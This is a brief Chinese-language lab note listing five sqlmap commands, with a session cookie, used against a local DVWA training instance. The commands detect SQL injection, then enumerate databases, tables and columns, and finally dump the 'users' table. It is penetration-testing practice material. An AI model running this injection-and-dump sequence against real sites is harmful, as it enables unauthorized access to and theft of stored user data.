1.检测漏洞:
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low"
其中cookie在f12-network-刷新-headers里面
2.获取数据库
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" --dbs
3.获取指定数据库表
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa --tables
4.获取指定表项:
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa -T users --columns
5.获取数据:
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa -T users --dump